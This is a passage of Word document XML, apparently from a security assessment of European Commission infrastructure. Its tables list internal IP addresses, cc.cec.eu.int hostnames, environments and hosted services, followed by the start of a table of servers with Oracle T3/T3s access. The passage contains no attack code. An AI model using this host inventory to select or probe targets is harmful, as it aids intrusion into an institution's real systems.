          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="25264972" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="42295FAA" w14:textId="0E5071CB" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.136.163</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4847D58C" w14:textId="52004095" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd11760.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="06D83F11" w14:textId="02614607"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30F83589" w14:textId="611ED88F"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3D2A91C0" w14:textId="2A039988" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CH-TI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="57D6AC81" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="48DC53F5" w14:textId="0CACCA1B" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.180.166</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="478DCB06" w14:textId="29E8E173" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03831.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="25B28A09" w14:textId="1D03F8AA"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4D66417A" w14:textId="63D47E11"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66EAC6BA" w14:textId="6725C2FB" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FGAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="7EDEBC26" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="61A4B005" w14:textId="24D8A2AB" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.180.165</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0601A3E2" w14:textId="671B3555" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03829.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="07F8D671" w14:textId="5ADE3E56"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70476F82" w14:textId="72DC1863"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7F8DD2D9" w14:textId="2EB60973" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ODS.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="7A13837A" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="41E4FE9B" w14:textId="3B838E23" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.180.159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="09086371" w14:textId="6B0DCEAC" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03803.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="21DBA571" w14:textId="2906EF46"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0266AD28" w14:textId="0E1B995B"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380D877C" w14:textId="18955AB2" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EUTL PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="055766B4" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="59A7D196" w14:textId="45AE3A9B" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.136.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1620417C" w14:textId="6EEE6F89" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd01981.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6E7CEB4A" w14:textId="5EFD5D62"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495B6D65" w14:textId="118419C9"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53808ABD" w14:textId="34C510F1" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EUTL PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="34D03BA1" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="050BCC67" w14:textId="4A39805D" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>10.130.131.119</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="30AD4A0F" w14:textId="25F42C79" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03450.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="02FEF599" w14:textId="73BEA055"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0A20A163" w14:textId="3E1BB03A"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20DC0C4A" w14:textId="0727C2D3" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="15CB7382" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="338C6864" w14:textId="6A0F81A2" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.134.65</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2C8D9ECE" w14:textId="749BF7A4" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03459.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="50121831" w14:textId="07DDA722" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6136FFB4" w14:textId="7DB124DA" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="15FC9421" w14:textId="1B69C0E4" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F180038" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="248" w:name="_Ref213159498"/>
      <w:bookmarkStart w:id="249" w:name="_Ref208398850"/>
      <w:bookmarkStart w:id="250" w:name="_Toc212654679"/>
      <w:bookmarkStart w:id="251" w:name="_Ref208309492"/>
      <w:bookmarkStart w:id="252" w:name="_Toc212654677"/>
      <w:bookmarkStart w:id="253" w:name="_Toc213253586"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Servers with Oracle T3/T3s access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="248"/>
      <w:bookmarkEnd w:id="253"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1390"/>
        <w:gridCol w:w="2173"/>
        <w:gridCol w:w="785"/>
        <w:gridCol w:w="1377"/>
        <w:gridCol w:w="1655"/>
        <w:gridCol w:w="1366"/>
      </w:tblGrid>
      <w:tr w:rsidR="002B3751" w:rsidRPr="001019D3" w14:paraId="1C6350C7" w14:textId="77777777" w:rsidTr="003F4055">
        <w:trPr>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56CD5EB3" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FB6EAB2" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FQDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47567732" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>DG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="787" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B278C68" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="946" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17426A6B" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Hosted Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69F94F47" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>T3 or T3s?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B3751" w:rsidRPr="001019D3" w14:paraId="4DD2654B" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="53742FF6" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="254" w:name="_Hlk207977859"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.179.158</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B60D2E6" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03800.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3C8795ED"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388F6CCE" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="946" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="714DEE27" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUTL PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55B64DC5"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7001B4B5" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1B84C936" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
